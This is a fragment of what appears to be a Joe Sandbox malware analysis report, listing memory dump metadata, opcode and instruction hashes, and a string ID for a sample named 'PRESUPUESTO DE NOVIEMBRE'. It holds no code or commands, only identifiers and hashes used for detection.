                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9489bf722ea92f3d329e4978c8e11bd3107a39822d09a871dd9746208ffbf18d
                                                                                              • Instruction ID: ba42f753c4da72d60b39905fac1ade94ebc95cebd7272d7a276b9e74af3d29b2
                                                                                              • Opcode Fuzzy Hash: 9489bf722ea92f3d329e4978c8e11bd3107a39822d09a871dd9746208ffbf18d
                                                                                              • Instruction Fuzzy Hash: 9BD0673AB400189FCB049F9CE880CDDFB76FB98221B448117FA15A3261C6319965DB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3d3c1e9eae6e2231ed5be108cb11d8875e0adf0a2a04c26ebd9477dac5248b4c
                                                                                              • Instruction ID: d31031d8d54615b22b8ec31bad13289de37723e6cddda0c707b10e1ea5b0c3f9
                                                                                              • Opcode Fuzzy Hash: 3d3c1e9eae6e2231ed5be108cb11d8875e0adf0a2a04c26ebd9477dac5248b4c
                                                                                              • Instruction Fuzzy Hash: B6C0123044430B4FCA15E776EE46619372EF6A0300B409520B0054A6BDDFB91C9A4694
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: \;_q$\;_q$\;_q$\;_q
                                                                                              • API String ID: 0-294077808
                                                                                              • Opcode ID: d138df4171d596b1e92b4c3ef0f263f801551b089dad6ff9c2c488979abfc4f8
                                                                                              • Instruction ID: aa7e4d7d19357ad8c5cb91a7b8f14ad84019ffe0d576d50143a541ec0d19907d
                                                                                              • Opcode Fuzzy Hash: d138df4171d596b1e92b4c3ef0f263f801551b089dad6ff9c2c488979abfc4f8
                                                                                              • Instruction Fuzzy Hash: EF01B13274111D8FE7A4CE2CC554929B3EFEF88B60B1948A9E485CB7B8DA32DC51C750